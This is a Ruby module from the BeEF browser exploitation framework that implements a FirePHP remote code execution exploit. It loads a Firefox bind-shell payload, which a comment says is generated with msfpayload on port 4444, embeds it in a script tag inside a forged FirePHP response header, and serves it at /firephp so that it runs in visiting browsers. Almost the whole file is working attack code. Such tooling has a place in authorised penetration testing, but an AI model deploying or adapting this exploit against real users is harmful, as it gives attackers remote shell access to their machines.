#
# Copyright (c) 2006-2020 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
###
# PoC by Wireghoul: http://www.justanotherhacker.com/advisories/jahx132.html
###
class Firephp_code_exec < BeEF::Core::Command

  def pre_send
    rand_str = rand(32**10).to_s(32)

    # load payload.js file
    # generate payload:
    #  msfpayload firefox/shell_bind_tcp LPORT=4444 R > payload.js
    payload = ""
    f = File.open("#{$root_dir}/modules/exploits/firephp/payload.js")
    f.each_line do |line|
      payload << line
    end
    f.close

    # construct exploit+payload HTTP response
    exploit = {
      "RequestHeaders" => {
        "1"=>"#{rand(10)}",
        "2"=>"#{rand(10)}",
        "3"=>"#{rand(10)}",
        "4"=>"#{rand(10)}",
        "5"=>"#{rand(10)}",
        "6"=>"#{rand(10)}",
        "7"=>"#{rand(10)}",
        "8"=>"#{rand(10)}",
        "9"=>"#{rand(10)}",
        "<script>#{payload}<\/SCRIPT>" => rand_str
      }
    }.to_json

    # mount exploit+payload at /firephp
    # @todo use Router class instead of bind_raw()
    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind_raw('200',
      {
        'Content-Type'       => 'text/html',
        'X-Wf-Protocol-1'    => 'http://meta.wildfirehq.org/Protocol/JsonStream/0.2',
        'X-Wf-1-Plugin-1'    => 'http://meta.firephp.org/Wildfire/Plugin/FirePHP/Library-FirePHPCore/0.3',
        'X-Wf-1-Structure-1' => 'http://meta.firephp.org/Wildfire/Structure/FirePHP/Dump/0.1',
        'X-Wf-1-1-1-1'       => "#{exploit.length}|#{exploit}|\r\n"
      },
      rand_str,   # HTTP body
      '/firephp', # URI mount point
      -1
    )
  end

  def post_execute
    save({'result' => @datastore['result']})
  end

end
